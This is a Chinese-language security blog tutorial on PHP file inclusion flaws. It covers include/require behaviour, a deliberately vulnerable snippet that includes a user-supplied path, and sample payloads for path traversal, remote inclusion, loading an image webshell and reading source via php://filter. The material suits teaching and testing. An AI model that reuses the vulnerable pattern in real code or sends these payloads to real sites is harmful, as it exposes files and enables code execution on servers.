文件包含

最新推荐文章于 2024-06-11 17:37:07 发布
最新推荐文章于 2024-06-11 17:37:07 发布
阅读量185 收藏 1
点赞数 3
分类专栏: 漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132777160
版权

1.文件包含概述

​ 程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成“封装”。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含。

​ 程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含),但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成任意文件包含漏洞。

​ 几乎所有的脚本都会提供文件包含的功能,文件包含漏洞在PHP 的Web 应用中居多,在JSP/ASP/ASP.NET 程序中比较少。

1.1 文件包含语句

PHP 提供了四个文件包含的语句,四个语句之间略有不同。

语句区别
include()多次包含,多次执行; 如果包含失败,脚本产生警告,继续运行。
include_once()多次包含,一次执行; 如果包含失败,脚本产生警告,继续运行。
require()多次包含,多次执行; 如果包含失败,脚本产生错误,结束执行。
require_once()多次包含,一次执行; 如果包含失败,脚本产生错误,结束执行。

1.1.1 相关配置

​ 文件包含是PHP 的基本功能之一,有本地文件包含与远程文件包含之分。简单来说,本地文件包含就是可以读取和打开本地文件,远程文件包含就是可以远程(方式)加载文件。可以通过php.ini 中的选项进行配置。

allow_url_fopen = On/Off         # 通过远程方式打开文件

allow_url_include = On/Off       # 通过远程方式包含文件

1.2 动态包含

1.2.1 示例代码

// file-include.php

$fp = @$_GET['filepath']; 
@include $fp;

1.2.2 本地文件包含

本地文件包含(Local File Include,LFI)通过本地路径访问到的文件。

 ?filepath=../phpinfo.php

1.2.3 远程文件包含

远程文件包含(Remote File Include,RFI),通过远程路径访问到的文件。

 ?filepath=http://10.9.64.180/phpinfo.jpg

1.3漏洞原理

1.3.1 漏洞原理

PHP 文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能时,有类似于以上测试代码的设计,实现了动态包含,就有产生文件包含漏洞的风险。如果实现动态包含的参数,Web 应用没有进行严格的校验,浏览器客户端用户可以影响控制被包含文件的路径,就会产生任意文件包含漏洞。

1.3.2 特点

无视文件扩展名读取文件内容。

 ?filepath=./a.jpg

无条件解析PHP 代码,为图片木马提供了出路。

?filepath=a_yjh_info.jpg

2.文件包含攻防

2.1 利用方法

2.1.1 包含图片木马

菜刀直接链接。

 http://10.4.7.130/file-include/file-include.php?filepath=a_yjh_info.jpg

2.1.2 读取敏感文件

利用文件包含漏洞,也可以读取敏感文件。前提条件:

  • 目标文件存在(已知目标文件路径);
  • 具有文件可读权限。

具体方法:

# 相对路径
?filepath=../../../../../../windows/system32/drivers/etc/hosts

# 绝对路径
?filepath=c:/windows/system32/drivers/etc/hosts

# 使用php 封装协议
?filepath=file://c:/windows/system32/drivers/etc/hosts
封装协议说明
file://访问本地文件系统
http://访问 HTTP(s) 网址
ftp://访问 FTP(s) URLs
php://访问各个输入/输出流(I/O streams)
zlib://压缩流
data://数据(RFC 2397)
glob://查找匹配的文件路径模式
phar://PHP 归档
ssh2://Secure Shell 2
rar://RAR
ogg://音频流
expect://处理交互式的流

2.1.3 读取****PHP 文件源码

利用php://fileter 读取。

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

读取结果:

PD9waHANCi8vIGZpbGUtaW5jbHVkZS5waHANCg0KJGZwID0gQCRfR0VUWydmaWxlcGF0aCddOw0KQGluY2x1ZGUgJGZwOw==

2.1.4 执行PHP 命令

利用php:

  • //input 执行PHP 命令;

  • 远程文件包含开启。

cgjil
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pte 文件包含
weixin_51387754的博客
10-13 1052
注册信息安全专业人员-渗透测试,英文为 Certified Information Security Professional - Penetration Test Engineer ,简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作,具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。
文件包含技术-常见文件包含
01-24
文件包含的一些常见路径
文件包含(File inclusion)
xuyunpeng3189的博客
01-31 653
原理:文件包含函数包含文件参数没有经过过滤或者严格的定义,并且参数可以被用户控制,就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么样的后缀类型,文件内的恶意代码都会被解析执行。 危害:服务器的网页篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 修复方法:设置白名单:代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。如果需要使用文件包含,则通过使用白名单的方法对要包含文件进行限制,这样可以做到既使用了文件包含,又可以防止文件包含漏洞。
文件包含知识学习总结
qq_64222098的博客
03-19 202
本地文件包含漏洞(LFI):只能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者可以控制的,所以一般攻击者都是包含一些固定的系统配置文件,从而去读取系统敏感信息。程序员一般会把重复使用的函数写入文件中,在需要使用某个函数时直接调用这个文件,这种文件的调用过程一般称为文件包含。在该目录下的web.xml文件中有某个文件的相关的映射的话,可以直接在页面访问这个文件,类似于文件包含。如果程序没有对文件的来源进行严格的审查,客户端就可以传入包含恶意代码的文件,导致文件包含漏洞。用来接收POST数据。
文件包含总结
akxnxbshai的博客
11-30 1374
简单总结一下php漏洞,然后再学习java。
文件包含这一篇就够了!
qq_33137821的博客
04-29 400
本文章仅供学习所用
文件包含的基本知识
cz020907020808的博客
06-25 267
文件包含时候,为了灵活包含文件设置为变量,通过动态变量来引入需要包含文件时,用户可以对变量进行合理检验或者检验被绕过,这样就导致了文件包含漏洞。当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时给出一个警告,继续向下执行。功能与include相同,区别在于代码执行到include函数时才将文件包含进来,发生错误时,继续向下执行。当包含文件在远程服务器上时,就形成了远程文件包含。当包含文件在服务器本地时,就形成了本地文件包含
文件包含漏洞全解
2301_78287784的博客
06-15 912
以上就是文件包含漏洞所有的内容,通过以上的介绍,我们可以看出文件包含漏洞利用难度,也可以根据他的原理提出修复建议:1、可以限制用户访问文件的权限;2、include函数中的参数用户是否可控,如果可控,则要限制;3、增加过滤,对用户输入的敏感参数进行过滤;4、配置文件中不必要开的参数设置为OFF等等,希望本文能对你有所帮助,星光安全面向基础。
文件包含知识点总结.pdf
02-10
根据网上视频课程学习总计知识点,文档结构分为文件包含的定义、php中文件包含函数、漏洞原理及特点、常见的利用方式做出总结 整理为文档 可以方便查阅
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使...
asp.net 包含文件的方法
10-29
ASP.NET文件包含的方法基本与ASP文件包含差不多!
文件操作之文件包含全解(31)
san3144393495的博客
06-01 963
文件包含的作用就是将这个文件包含进去之后,会调用指定文件的代码。先将文件包含才能执行里面的一些相关代码,比如所想进行文件的链接,数据库的查询,就可以先包含一个数据库的配置文件, 再去链接的话就享有配置文件的一些配置信息,就不需要在进行相关的操作。它可以把一些功能性代码写到一个文件里面,然后用另外一个文件包含这个文件,这样子就不再重复书写那个包含文件里面的代码。==#include file=”top.aspx”--> 这个aspx运行,包含了一个top.aspx文件。> php的写法。
一文详解文件包含漏洞
MachineGunJoe666
06-10 1761
file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的文件路径。
文件包含漏洞详解
good good study
03-05 5063
大多数情况下,文件包含函数中包含的代码文件是固定的,如上面中的include "./info.php"直接是写死了,因此也不会出现安全问题。但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。上面说了文件包含漏洞的成因是因为代码实现了动态包含包含的路径可控,于是我们将代码进行修改为动态传参的一种方式,建立文件index.php,文件内容如下。文件包含是PHP 的基本功能之一,有本地文件包含和远程文件包含之分。
文件包含(CTF)
热门推荐
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
学习笔记-文件包含
m0_56171651的博客
08-19 1317
文件包含-学习笔记
数字时代网络安全即服务的兴起
最新发布
网络研究观
06-11 569
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
dvwa文件包含教程
05-05
DVWA的文件包含漏洞教程主要包括以下几个步骤: 1. 下载和安装DVWA:首先,你需要下载并安装DVWA。你可以在DVWA的官方网站上找到最新版本的下载链接。安装过程可能会因操作系统和Web服务器的不同而有所不同。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值